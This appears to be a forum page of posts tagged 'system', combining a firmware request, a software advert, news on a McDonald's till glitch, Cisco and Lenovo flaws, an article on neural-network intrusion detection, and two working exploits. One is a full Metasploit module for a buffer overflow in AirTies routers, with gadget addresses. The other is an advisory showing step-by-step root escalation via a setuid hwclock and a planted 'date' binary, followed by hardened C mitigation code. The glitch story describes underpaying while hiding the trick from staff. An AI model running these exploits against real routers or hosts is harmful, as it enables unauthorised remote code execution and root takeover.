Showing results for tags 'system'.

  1. Hello, I am making a request to the community: could anyone give me the system.img file for the Allview A5 Smiley, or could anyone running Ubuntu/Linux help me do the repack procedure for the System folder? P.S. I need the system.img file for SP Flash Tool. Or how can I flash the System folder onto a device without a system.img? P.S. Or how can I extract system.img from an unrooted phone (CWM recovery installed)?
  2. Product Description

We all like fast and secure computers, but only constant system maintenance and time-consuming optimizations will keep them that way. Those of us who like to invest time and effort to keep up with the latest developments may very well handle those tasks using default Windows tools alone. As system experts, they love to accelerate their machines, protect their privacy, clean and backup system files, fix common Windows errors and perform many other tasks. This not only sounds like a lot of work, it is! Our WinOptimizer will do the work for you, easy, fast and efficiently. It will give you maximum performance and security and save you precious time so you can get real work done instead.

Ashampoo WinOptimizer 11 …

… frees space
Make orphaned files, program remains and temporary files disappear and delete no longer needed documents irrevocably. Find duplicate files and track down resource hogs. Reclaim your disk space!

… fixes errors
Clean your Windows Registry, fix file system errors and monitor the health of your disk drives. Just say No to Windows errors!

… guarantees steady performance
Use the powerful Live Tuner to auto-tune your applications for maximum speed and optimize your Internet connection. Get more performance out of your PC!

… protects your privacy
Wipe all Internet traces from your system and encrypt sensitive data safely. Now, you decide what information is automatically sent to Microsoft on a regular basis. Protect yourself against prying eyes!

… customizes Windows to your needs
Adjust hidden system settings, alter file type associations or adjust context menu entries easily. More flexibility for you!

More power under the hood
Ashampoo WinOptimizer 11 not only provides extensive system details but it is also the fastest WinOptimizer ever. Completely redeveloped core algorithms and radical program code optimization make it a screamer.

Live Tuner 2.0 – More efficient, more effective, more versatile
With brand-new algorithms, Live Tuner can accelerate applications more effectively while using less memory resources. Options for rule-based tuning have also been greatly enhanced.

Game Booster – Turbo for gamers
Game Booster gives you excellent gaming performance at the click of a button. All non-essential Windows processes will automatically be shut down and memory freed. Perfect gaming conditions instantly.

User Rights Manager – Have it your way
Discover the easiest way to define which actions, settings or applications can happen on your machine. For example, prevent your kids from installing programs, altering critical system settings or launching unsuitable applications.

Faster, leaner, more efficient
Ashampoo WinOptimizer 11 starts up faster and requires less memory. This is especially true for Live Tuner, which can now optimize application processes more efficiently. The detection rate for all cleaners has been increased and the integrated backup system now supports incremental backups for modified system files.

Get more out of your PC and get Ashampoo WinOptimizer 11 – the tuning specialist for your PC.

-> Download <-
Deal Expires in: EXPIRED! Grab 50% Discount Coupon on Ashampoo WinOptimizer 11 With Free Updates. Click Here.
  3. Viral Facebook post shows how buyers can get meals at half the price from McDonald’s self-service by exploiting a system glitch

Customers in Australia were treated to a 50% discount meal due to a glitch in the self-service system at a McDonald’s unit. The fault could be made full use of straight from the menu option. Had someone not posted a video on Facebook explaining the steps to get the price cut, McDonald’s would probably have taken some time to find the fault.

Max Jalal shared the mobile phone footage showing how he and his group of friends get a family value Dinner Box that usually costs $19.95 / €17.50 for just $9.95 / €8.80 by doing nothing but using the self-serve tills. Jalal suggests going with the option to pay at the counter instead of the machine, in order to keep the employees unaware of the trick.

Max Jalal selects a $20 dinner box, then his friend, who is doing the filming, is heard saying: “This is the best bit, watch this.” He then selects an L and P option from the drinks menu and adds it to his bill, but it reduces the total price down to $17.20. He then repeats this step three more times until the total is reduced to less than half. The option is easy to locate as it shows no image of a product or price. Jalal’s bill was half the original value after repeating this step four times. It seemed like the glitch could not be exploited further than this.

The video clip was shot in a branch of the fast-food retailer in Melbourne, Australia. As expected, the Facebook post went viral and managed to garner a lot of attention. The video clip was viewed by more than 1.5 million people after it was posted to Facebook and shared. Self-service systems have been available in other parts of the world for years, but it is not clear if this process has the same effect on them too. The machine at the respective location has been fixed by McDonald’s Australia and the machine should now work as it is meant to.

It appears that this was an exceptional case. A McDonald’s spokesman speaking to Daily Mail Australia said: “It is a new computer system and the nature of computer systems mean sometimes glitches can happen.” He added he was “fairly confident” there weren’t any other faults in the system that would let people reduce the price of their meal.

Source
  4.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Airties login-cgi Buffer Overflow',
      'Description'    => %q{
        This module exploits a remote buffer overflow vulnerability on several
        Airties routers. The vulnerability exists in the handling of HTTP
        queries to the login cgi with long redirect parameters. The
        vulnerability doesn't require authentication. This module has been
        tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware
        with emulation. Other versions such as the Air6372, Air5760, Air5750,
        Air5650TT, Air5453, Air5444TT, Air5443, Air5442, Air5343, Air5342,
        Air5341, Air5021 are also reported as vulnerable.
      },
      'Author'         =>
        [
          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
          'Michael Messner <devnull[at]s3cur1ty.de>'         # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSBE,
      'References'     =>
        [
          ['EDB', '36577'],
          ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], # advisory
          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt']             # PoC
        ],
      'Targets'        =>
        [
          [ 'AirTies_Air5650v3TT_FW_1.0.2.0',
            {
              'Offset'        => 359,
              'LibcBase'      => 0x2aad1000,
              'RestoreReg'    => 0x0003FE20, # restore s-registers
              'System'        => 0x0003edff, # address of system-1
              'CalcSystem'    => 0x000111EC, # calculate the correct address of system
              'CallSystem'    => 0x00041C10, # call our system
              'PrepareSystem' => 0x000215b8  # prepare $a0 for our system call
            }
          ]
        ],
      'DisclosureDate' => 'Mar 31 2015',
      'DefaultTarget'  => 0))

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    begin
      res = send_request_cgi({
        'uri'    => '/cgi-bin/login',
        'method' => 'GET'
      })
      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("#{peer} - Exploiting...")

    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 100
    )
  end

  def prepare_shellcode(cmd)
    shellcode = rand_text_alpha_upper(target['Offset'])                 # padding
    shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N")  # restore registers with controlled values
    # 0003FE20 lw $ra, 0x48+var_4($sp)
    # 0003FE24 lw $s7, 0x48+var_8($sp)
    # 0003FE28 lw $s6, 0x48+var_C($sp)
    # 0003FE2C lw $s5, 0x48+var_10($sp)
    # 0003FE30 lw $s4, 0x48+var_14($sp)
    # 0003FE34 lw $s3, 0x48+var_18($sp)
    # 0003FE38 lw $s2, 0x48+var_1C($sp)
    # 0003FE3C lw $s1, 0x48+var_20($sp)
    # 0003FE40 lw $s0, 0x48+var_24($sp)
    # 0003FE44 jr $ra
    # 0003FE48 addiu $sp, 0x48
    shellcode << rand_text_alpha_upper(36)                               # padding
    shellcode << [target['LibcBase'] + target['System']].pack('N')       # s0 - system address-1
    shellcode << rand_text_alpha_upper(16)                               # unused registers $s1 - $s4
    shellcode << [target['LibcBase'] + target['CallSystem']].pack('N')   # $s5 - call system
    # 00041C10 move $t9, $s0
    # 00041C14 jalr $t9
    # 00041C18 nop
    shellcode << rand_text_alpha_upper(8)                                # unused registers $s6 - $s7
    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system
    # 000215B8 addiu $a0, $sp, 0x20
    # 000215BC lw $ra, 0x1C($sp)
    # 000215C0 jr $ra
    # 000215C4 addiu $sp, 0x20
    shellcode << rand_text_alpha_upper(28)                               # padding
    shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N')   # add 1 to s0 (calculate system address)
    # 000111EC move $t9, $s5
    # 000111F0 jalr $t9
    # 000111F4 addiu $s0, 1
    shellcode << cmd
  end

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)
    begin
      res = send_request_cgi({
        'method'        => 'POST',
        'uri'           => '/cgi-bin/login',
        'encode_params' => false,
        'vars_post'     => {
          'redirect' => shellcode,
          'user'     => rand_text_alpha(5),
          'password' => rand_text_alpha(8)
        }
      })
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

Source
  5. Hello,

During a recent assessment I have stumbled across a system which had hwclock(8) setuid root.

hwclock is a part of util-linux, all versions affected.

$ man hwclock | sed -n '223,231p'
   Users access and setuid
       Sometimes, you need to install hwclock setuid root. If you want users other than the superuser to be able to display the clock value using the direct ISA I/O method, install it setuid root. If you have the /dev/rtc interface on your system or are on a non-ISA system, there's probably no need for users to use the direct ISA I/O method, so don't bother.

       In any case, hwclock will not allow you to set anything unless you have the superuser real uid. (This is restriction is not necessary if you haven't installed setuid root, but it's there for now).

http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L2041
"The program is designed to run setuid superuser, since we need to be able to do direct I/O. (More to the point: we need permission to execute the iopl() system call). (However, if you use one of the methods other than direct ISA I/O to access the clock, no setuid is required)."

http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L1920
"program is designed to run setuid (in some situations)"

Some comments in the code and unfortunately also the man page advertise that setuid is no problem. That's a pretty stupid promise.

from util-linux/2.26.2-5/sys-utils/hwclock.c
http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L748

    /* Quotes in date_opt would ruin the date command we construct. */
    if (strchr(date_opt, '"') != NULL) {
        warnx(_
              ("The value of the --date option is not a valid date.\n"
               "In particular, it contains quotation marks."));
        return 12;
    }

    sprintf(date_command, "date --date=\"%s\" +seconds-into-epoch=%%s",
            date_opt);
    [...]
    date_child_fp = popen(date_command, "r");
    [...]

hwclock uses popen() to run date_command, which is 'date --date=\"%s\" +seconds-into-epoch=%%s'.

Exploiting is trivial, since $PATH is user-controlled.

$ ls -l /usr/sbin/hwclock
-rwsr-sr-x. 1 root root 48096 Nov 27 14:10 /usr/sbin/hwclock

$ cat > date.c;gcc date.c -o date
main() { chown("/tmp/sploit", 0, 0); chmod("/tmp/sploit", 04755); }
^D

$ cp /bin/sh /tmp/sploit
$ PATH=".:$PATH" /usr/sbin/hwclock --set --date="05/23/2015 20:35:37"
hwclock: The date command issued by hwclock returned unexpected results.
The command was:
  date --date="05/23/2015 20:35:37" +seconds-into-epoch=%s
The response was:

hwclock: No usable set-to time. Cannot set clock.

$ /tmp/sploit
# id
euid=0(root) groups=0(root)

*Insert CVE Request here*

Notes:

Please note that this is possible on Debian-derived systems (and therefore Ubuntu), because /bin/sh is provided by dash, which does NOT make use of privmode (does not drop privileges if ruid != euid, unlike bash), which is a very stupid idea. privmode is surprisingly effective at mitigating some common vulnerability classes and misconfigurations, and it has been around since the mid-90s. Indeed, Chet Ramey (bash author and maintainer) explains that the purpose of this is to prevent "bogus system(3)/popen(3) calls in setuid executables".

TL;DR: When setuid root, hwclock relies on $PATH to popen() the date command, meaning privilege escalation can occur since $PATH is user-controlled.

Patches are available, signed off by Karel Zak <kzak@redhat.com>
https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1

Initial bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=786804

Thanks,
Federico Bento.

Source: http://dl.packetstormsecurity.net/1505-exploits/hwclock-escalate.txt
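A hardened replacement for the popen("date ...") pattern the advisory above describes, added here as an example; it is not the advisory's code and not the util-linux fix. Instead of handing a shell a command string resolved through $PATH, the helper is executed by absolute path with a fixed environment, in a child that has first dropped to the caller's real uid/gid, and the date string travels as one argv element so quoting is irrelevant. The function names are mine; the /bin/date path and GNU date's `--date`/`+%s` options are assumptions.

```c
/* Added example (not from the advisory or util-linux): running a helper
 * from a setuid program without trusting $PATH or a shell. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Audit helper: does this PATH value contain an entry a caller could point at
 * a directory they control? Empty entries ("a::b", trailing ':') and relative
 * entries (".", "bin") count as unsafe; only absolute directories are accepted. */
int path_has_unsafe_entry(const char *path)
{
    if (path == NULL)
        return 0;                       /* nothing for a shell to search */
    const char *p = path;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (colon == NULL)
            break;
        p = colon + 1;
    }
    return 0;
}

/* Mitigation: run /bin/date (assumed path) by absolute path, with a scrubbed
 * environment, after the child has permanently dropped to the real uid/gid.
 * Returns seconds since the epoch, or -1 on any failure. */
long run_date_unprivileged(const char *date_opt)
{
    if (date_opt == NULL || *date_opt == '\0')
        return -1;

    int fds[2];
    if (pipe(fds) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        /* Child: gid first, then uid; if either fails, refuse to continue. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) < 0)
            _exit(127);
        close(fds[1]);

        char arg[256];
        if (snprintf(arg, sizeof arg, "--date=%s", date_opt) >= (int)sizeof arg)
            _exit(127);                 /* refuse oversized input instead of truncating */
        char *argv[] = { "/bin/date", arg, "+%s", NULL };
        char *envp[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL }; /* caller's env discarded */
        execve(argv[0], argv, envp);    /* absolute path: PATH is never consulted */
        _exit(127);
    }

    /* Parent: read the one line date prints, then reap the child. */
    close(fds[1]);
    char buf[64];
    size_t total = 0;
    for (;;) {
        ssize_t n = read(fds[0], buf + total, sizeof buf - 1 - total);
        if (n <= 0)
            break;
        total += (size_t)n;
        if (total >= sizeof buf - 1)
            break;
    }
    close(fds[0]);
    buf[total] = '\0';

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        return -1;                      /* date rejected the input or could not run */

    char *end;
    errno = 0;
    long secs = strtol(buf, &end, 10);
    if (errno != 0 || end == buf || (*end != '\n' && *end != '\0'))
        return -1;
    return secs;
}
```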
  6. Cisco has patched a remote code execution bug that could give attackers root privileges on its Unified Computing System (UCS) Central software used by more than 30,000 organisations. The UCS data centre server platform joins hardware, virtualisation, networking and software into one system. Versions 1.2 and below are affected.

The Borg says the vulnerability (CVE-2015-0701) rates the maximum 10 severity rating due to its low exploitation requirements and "complete" impact to confidentiality, integrity and availability. "A vulnerability in the web framework of Cisco UCS Central Software could allow an unauthenticated, remote attacker to execute arbitrary commands on an affected device," it says in an advisory. "The vulnerability is due to improper input validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the root user."

The Borg says patches for the bug are available but warns there are no workarounds. Successful exploitation of the problem would grant unauthenticated access to sensitive information, allow arbitrary command execution on UCS boxes' operating systems, or create denial of service conditions. Happily, no attacks using the flaw have been spotted in the wild.

Source
  7. Hi, I'm back with an interesting piece of news, namely that Lenovo's security is creaking. A new security problem was discovered in the past few days; better now than never.

Lenovo has been accused of having major security problems because of vulnerabilities in its online update service. This comes after the Superfish scandal at the beginning of the year. It seems that because of the current vulnerabilities, hackers can download dangerous programs onto users' systems through a MITM (man-in-the-middle) attack.

Between September 2014 and January 2015, Lenovo preinstalled on many computers an adware application that exposed users to major security risks. Superfish was also able to replace the system's SSL certificates, reducing the security offered by HTTPS connections to zero.

The problems were pointed out by the security firm IOActive, a few weeks after it became known that Lenovo was shipping computers with Superfish preinstalled. The researchers discovered the vulnerabilities in February but gave Lenovo the opportunity to fix them before making them public, notes SC Magazine.

One of the vulnerabilities, CVE-2015-2233, allows hackers to bypass signature validity checks and replace Lenovo applications with malicious software. CVE-2015-2219, another bug, allows access and the running of malicious programs and commands. Another weakness, CVE-2015-2234, allows running commands that normally only the system administrator can issue.

Sofiane Talmat, security consultant at IOActive, confirmed to SCMagazine that Lenovo has fixed the problems, but that users must download the latest version of Lenovo System Update to be safe.

Update: This article has been supplemented with Lenovo's official statement:

“Lenovo's development and security teams worked directly with IOActive on the System Update application vulnerabilities the latter identified, and we appreciate their expertise in identifying and responsibly reporting them. On April 1 Lenovo released an updated version of the System Update application that resolves these vulnerabilities. We subsequently published, in collaboration with IOActive, a security advisory, available here. If the System Update application is already installed, the user is prompted to install the updated version as soon as the application runs. As an alternative, users can update System Update manually by following the steps described in the security advisory. Lenovo recommends that all users update the System Update application to eliminate the vulnerabilities reported by IOActive. In general, Lenovo recommends that its users enable automatic system updates so they always have access to the newest software available.”

Thank you for your time!
  8. Intrusion systems have been the subject of considerable research for decades to improve the inconsistencies and inadequacies of existing methods, from basic detectability of an attack to the prevention of computer misuse. It remains a challenge still today to detect and classify known and unknown malicious network activities through identification of intrusive behavioral patterns (anomaly detection) or pattern matching (misuse or signature-based detection). Meanwhile, the number of network attack incidents continues to grow. Protecting a computer network against attacks or cybersecurity threats is imperative, especially for companies that need to protect not only their own business data but also sensitive information of their clients as well as of their employees. It is not hard to see why even just one breach in data security from a single intrusion of a computer network could wreak havoc on the entire organization. Not only would it question the reliability of the networks’ infrastructure, but it could also seriously damage the business’s reputation. An organization’s first defense against breaches is a well-defined corporate policy and management of systems, as well as the involvement of users in protecting the confidentiality, integrity, and availability of all information assets. Security awareness training is a baseline for staff to gain the knowledge necessary to deter computer breaches and viruses, mitigate the risks associated with malicious attacks, and defend against constantly evolving threats. Users’ awareness and strict IT policies and procedures can help defend a company from attacks, but when a malicious intrusion is attempted, technology is what helps systems administrators protect IT assets. When it comes to perimeter data security, traditional defense mechanisms should be in layers: firewalls, intrusion detection systems (IDS) and intrusion prevention systems (IPS) can be used. 
Research and new developments in the field of IDPS (Intrusion Detection and Prevention System) prove different approaches to anomaly and misuse detection can work effectively in practical settings, even without the need of human interaction/supervision in the process. Several case studies emphasize that the use of Artificial Neural Networks (ANN) can establish general patterns and identify attack characteristics in situations where rules are not known. A neural network approach can adapt to certain constraints, learn system characteristics, recognize patterns and compare recent user actions to the usual behavior; this allows resolving many issues/problems even without human intervention. The technology promises to detect misuse and improve the recognition of malicious events with more consistency. A neural network is able to detect any instances of possible misuse, allowing system administrators to protect their entire organization through enhanced resilience against threats. This article explores Artificial Intelligence (AI) as a means to solve the difficulties in identifying intrusions of insecure networks, such as the Internet, and discusses the use of artificial neural networks (ANN) for effective intrusion detection to detect patterns that separate attacks from genuine traffic. It will clarify why ANN technology offers a promising future in the identification of instances of misuse against computer systems. Furthermore, the article will also point out the different directions in which research on neural networks concentrate and the developments and expected future in the intrusion detection and prevention (IDPS) field. 
IDS & IPS Technology: Detection and Prevention Techniques With computer intrusions—the unauthorized access or malicious use of information resources—becoming more common and a growing challenge to overcome, IT professionals have come to rely more on detection and prevention technologies to protect availability of business-critical information resources and to safeguard data confidentiality and integrity. IDS tools sniff network packet traffic in search of interferences from external sources and can spot a hacker attempting to gain entry; they are designed to detect threats, misuse or unauthorized access to a system or network and are able to analyze system events for signs of incidents. Using both hardware and software, IDSs can detect anything that is suspicious either on a network or host; they then create alarms that system administrators can review to spot possible malicious entries. Intrusion detection systems (IDS) can be classified as: Host based or Network based with the former checking individual machines’ logs and the latter analyzing the content of network packets; Online or Offline, capable of flagging a threat in real-time or after the fact to alert of a problem; Misuse-based or Anomaly-based, either specifically checking a deviation from a routine behavior or comparing activities with normal, known attackers’ behavior. While an IDS is designed to detect attacks and alert humans to any malicious events to investigate, an IPS is used to prevent malicious acts or block suspicious traffic on the network. 
There are four different types of IPS: network-based intrusion prevention system (NIPS) that looks at the protocol activity to spot suspicious traffic; wireless intrusion prevention system (WIPS) that analyzes wireless networking protocols and is so important in the BYOD and mobile-centric world; network behavior analysis (NBA) that can spot attacks that create unusual traffic, such as distributed denial of service (DDoS) attacks, and it can use anomaly-based detection and stateful protocol analysis; and host-based intrusion prevention system (HIPS) that can be installed on single machines and can use signature-based and anomaly-based methods to detect problems. IDS and IPS tools are often used concurrently, as they are not mutually exclusive. Thus IDPS can offer twice the protection. Security technologist and chief technology officer of Co3 Systems Bruce Schneier mentions, “Good security is a combination of protection, detection, and response.” That just happens to be what IDPS does; it is deployed for information gathering, logging, detection and prevention. These tools provide threat identification capabilities, attack anticipation, and more. Having a network-based IDPS (NIDPS) with signature-based and anomaly-based detection capabilities allows inspecting the content of all the traffic that traverses the network. NIDPS are essential network security appliances that help in maintaining the security goals. They are highly used, as Indraneel Mukhopadhyay explains, for “identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators.” The all familiar Snort—an open-source NIDPS—is a highly used free threat intelligence program, created by Martin Roesch in 1998, that is capable of real-time traffic analysis and packet logging; it utilizes a rules-based detection engine to look for anomalous activity. What makes it a popular choice is its easy-to-use rule language. 
It can protect even the largest enterprise networks. Snort is an IP-centric program; administrators can view system security logs and find any irregularities or issues relating to things such as improper access patterns. Snort is said to be the most widely deployed intrusion prevention system in the world. Deploying IDS and IPS devices requires a specialized skill set to ensure it properly identifies abnormal traffic and alert network administrator as needed. Along with proper configuration to a predefined rule set, provided by the administrator, these devices need to be fine-tuned (as new threats are discovered) in order to weed out false positives and be adjusted to specific network parameters (when the infrastructure has been altered) to maximize accuracy. Once the type of IDPS technology has been selected, it is key to determine how many components (sensors, agents) will need to be deployed to function accurately to capture security issues, process events and alert appropriate personnel of suspicious activities. Direct network monitoring of the IDPS components like inline sensors between the firewall and the Internet border router is essential to achieve detection and prevention of malicious activity, such as denial of service attacks committed by an intruder. IDPS agents installed on endpoints can not only monitor the current network but also can assign appropriate priorities to alerts. Past and Present of IDSs IDPSs are able to monitor the events of interests on the systems and/or networks and are then able to identify possible incidents, log information about them, and attempt to stop common attacks and report them to security administrators. 
In the past, Intrusion Detection and Prevention (IDPS) has either been signature-based (able to check activity against known attackers’ patterns, the signature), anomaly-based (also referred to as heuristic, that alerts when traffic and activity are not normal), or based on stateful protocol analysis that looks at the “state” in a connection and “remembers” significant events that occur. These methods are effective but do have some downfalls. IDSs are known to have two main problems: the number of alarms generated and the need for tuning. Anomaly-based detection, for example, needs training and if issues arise during the training period a malicious behavior might be “learned” as legitimate by the system; it’s also prone to many false positives. When analysis is based on rules provided by a vendor or an administrator, instead, updates must be frequent to ensure the proper functioning of the system. The number of alarms generated (many being false) can overwhelm system security managers and prevent them from quickly identifying real ones. The continuous tuning of the intrusion to detect the slightest of variances and training required in order to maintain sufficient performance remains an issue. With a growing number of intrusion events, there is the need to use innovative intrusion detection techniques for critical infrastructure network protection. Research has concentrated on Artificial Neural Networks (ANNs) that can provide a more flexible approach to intrusion prevention in terms of learning. As the need for reliable automatic IDPS builds up, for it to gain acceptance as a viable alternative, it needs to function at a sufficient level of accuracy. That is where Neural Networks and Artificial Intelligence can play an effective role in the improvement of ID systems with the ability to learn from previous episodes of intrusion to identify new types of attack with less analyst interaction with the ID itself. 
In fact, information system experts believe that Artificial Intelligence (AI) can provide significant improvements to IDS/IPS systems, especially in terms of effectiveness and decreased false positive/negative rates, a major issue in intrusion management. Next Generation Intrusion Detection and Prevention (IDPS) Due to a new generation of hackers that are better organized and equipped than in the past, to get past perimeter security, it is clear that a different approach is required, says Joshua Crumbaugh, lead penetration tester at Tangible Security, Inc., NagaSec. As per the DRAFT Special Publication 800-94 Revision 1, Guide to …, the Next-Generation IDPS for host and network-based deployment options will have automated identification, location, isolation, and resolution of threats in real-time. A GCN staff post, “What’s next in cybersecurity automation,” provides insight on the Enterprise Automated Security Environment (EASE) concept for “shared situational awareness in cyber-relevant time” and, with the concerted efforts of government and private sector interests, the concept may foster continuous innovation for cyberspace defense across the board. Other than EASE, the US Government has already evaluated other options to defend against cyber-attacks that mine homeland security. It pursued, for example, as a project to develop a smart network of sensors (named Einstein) to detect cyber-attacks against critical infrastructures. IPS/IDS has changed, as research shows, with AI techniques that have improved IDSs by making them capable of detecting both current and future intrusion attacks while triggering fewer false positives and negatives. New ANNIDS (Neural networks applied to IDS) techniques have been able to improve the way detection systems are trained to recognize patterns, conduct problem solving and fault diagnosis too. 
In today's world there is a need "for building high-speed, reliable, robust and scalable ANN-based network intrusion detection and prevention system that is highly useful for [humankind] and organizations," Mukhopadhyay says. Neural-network-based AIs can discover emergent collective properties that are too complex to be noticed by either humans or other computing techniques. AI-based techniques are used to classify the behavior patterns of a user and of an intruder in a way that minimizes false alarms, explains Archit Kumar, an M.Tech student in the Department of CSE in India, in a research paper for IJARCSMS. An ANN-based IDS uses algorithms that analyze the captured data and judge whether it represents an intrusion, by behavioral analysis of the neural computation during both learning and recall. Although the main drawbacks of ANNIDS are lower detection precision for low-frequency attacks and weaker detection stability at the start, it is a suitable solution for intrusion detection and network security, says Suresh Kashyap, a research scholar at Dr. C.V. Raman University, India. He adds that an ANNIDS can be trained and tested on customized datasets, enabling it to identify known and unknown (new) attacks with increasing accuracy where other methods fail. Current AI techniques for automating the intrusion detection process are not easily deployable in real life, yet many experiments and tests have shown ANNs capable of detecting intrusive activity in a distributed environment and providing local "threat-level" monitoring of DDoS attacks before an intrusion completes. ANNs have strong learning capabilities and are effective at capturing anomalous activity, but they also have significant drawbacks, such as the high computational resources they require.
Researchers have been working to resolve this by finding ways to help ANN systems process information faster and more effectively. An approach combining AI techniques with genetic algorithms and fuzzy logic, for instance, proved well suited to detecting malicious behavior in distributed computer systems. Research has also looked at clustering data into subgroups with fuzzy clustering and then running a different ANN on each subgroup; results are obtained faster and are then aggregated into a complete picture. Another method explored more recently is the deployment of new ANN-based intelligent hybrid IDS models for anomaly detection that bring network- and host-based technologies under a single management console. These apply to many environments, from grid and cloud computing to mobile and network computers. In such an architecture, a Distributed Intrusion Detection System (DIDS) relying on network- and host-based sensors can increase the efficiency of the system, quickly yielding abnormal-data results determined by multiple heterogeneous recognition engines and management components.

Conclusion

Whether through a hybrid IDS using honeypot technology and anomaly detection or through artificial neural network (ANN) based IDS techniques, it is essential to detect and prevent attacks as soon as they are attempted. Information security practitioners suggest that organizations are confident the security control mechanisms they have in place are sufficient to protect computer data and programs, but apparently, according to the PwC findings from the 2014 US State of Cybercrime Survey, a good majority of them fail to assess for threats or to place emphasis on prevention mechanisms. What's more, they also lack the ability to diagnose and troubleshoot even less sophisticated attacks and have yet to consider where IDS/IPS fits in their security plan.
Both solutions work together and form an integral part of a robust network defense. According to the annual Worldwide Infrastructure Security Report (WISR), which provides insight into the global threat landscape, organizations will face even more concerns regarding APTs, so they ought to step up their network security defenses with near-real-time intrusion detection to defend critical data and applications from today's sophisticated attacks. The new reality in IT security is that network breaches are inevitable, and the ability to monitor and control access, behavior patterns and misuse relies on intrusion detection and prevention methods that identify them more quickly and address them more effectively. An IDS/IPS is a must-have; an ANN model based on ESNN that learns patterns and classifies intrusion data packets is an effective approach. The main advantages of ANNs over traditional IDSs are their abilities to learn, classify and process information faster, and their capacity for self-organization. For these reasons, neural networks can increase the accuracy and efficiency of IDSs, and AI techniques can improve IDS/IPS effectiveness.

References

Brecht, D. (2010, April 15). Network Intrusion Detection Systems: a 101. Retrieved from "What is a Network Intrusion Detection System (NIDS)?"
Compare Business Products. (2014, March 18). Security: IDS vs. IPS Explained.
GCN. (2014, December 9). What's next in cybersecurity automation.
Infosecurity Magazine. (2011, October 21). Small enterprises are suffering more intrusions, survey finds.
InfoSight Inc. (n.d.). Intrusion Detection (IDS) & Intrusion Prevention (IPS).
Kashyap, S. (2013, May). Importance of Intrusion Detection System with its Different approaches. Retrieved from http://www.ijareeie.com/upload/may/24_Importance.pdf
Kumar, A. (2014, May). Intrusion detection system using Expert system (AI) and […]. Retrieved from http://www.ijarcsms.com/docs/paper/volume2/issue5/V2I5-0064.pdf
Mukhopadhyay, I. (2014). Hardware Realization of Artificial Neural Network Based Intrusion Detection & Prevention System. Retrieved from http://file.scirp.org/Html/3-7800230_50045.htm
Onuwa, O. (2014, November 29). Improving Network Attack Alarm System: A Proposed Hybrid Intrusion Detection System Model. Retrieved from http://www.computerscijournal.org/vol7no3/improving-network-attack-alarm-system-a-proposed-hybrid-intrusion-detection-system-model/
Saied, A. (n.d.). Artificial Neural Networks in the detection of known and unknown DDoS attacks: Proof-of-Concept. Retrieved from http://www.inf.kcl.ac.uk/staff/richard/PAAMS-WASMAS_2014.pdf
Surana, S. (2014). Intrusion Detection using Fuzzy Clustering and Artificial Neural Network. Retrieved from http://www.wseas.us/e-library/conferences/2014/Gdansk/FUNAI/FUNAI-32.pdf
Vieira, K. (2010, August). Intrusion Detection for Grid and Cloud Computing. Retrieved from http://www.inf.ufsc.br/~westphal/idscloud.pdf
Wang, L. (n.d.). Artificial Neural Network for Anomaly Intrusion Detection. Retrieved from https://www.cs.auckland.ac.nz/courses/compsci725s2c/archive/termpapers/725wang.pdf
Zakaria, O. (n.d.). Identify Features and Parameters to Devise an Accurate Intrusion Detection System Using Artificial Neural Network. Retrieved from http://www.academia.edu/2612588/Identify_Features_and_Parameters_to_Devise_an_Accurate_Intrusion_Detection_System_Using_Artificial_Neural_Network
Zamani, M. (2013, December 8). Machine Learning Techniques for Intrusion Detection. Retrieved from http://arxiv.org/pdf/1312.2177.pdf
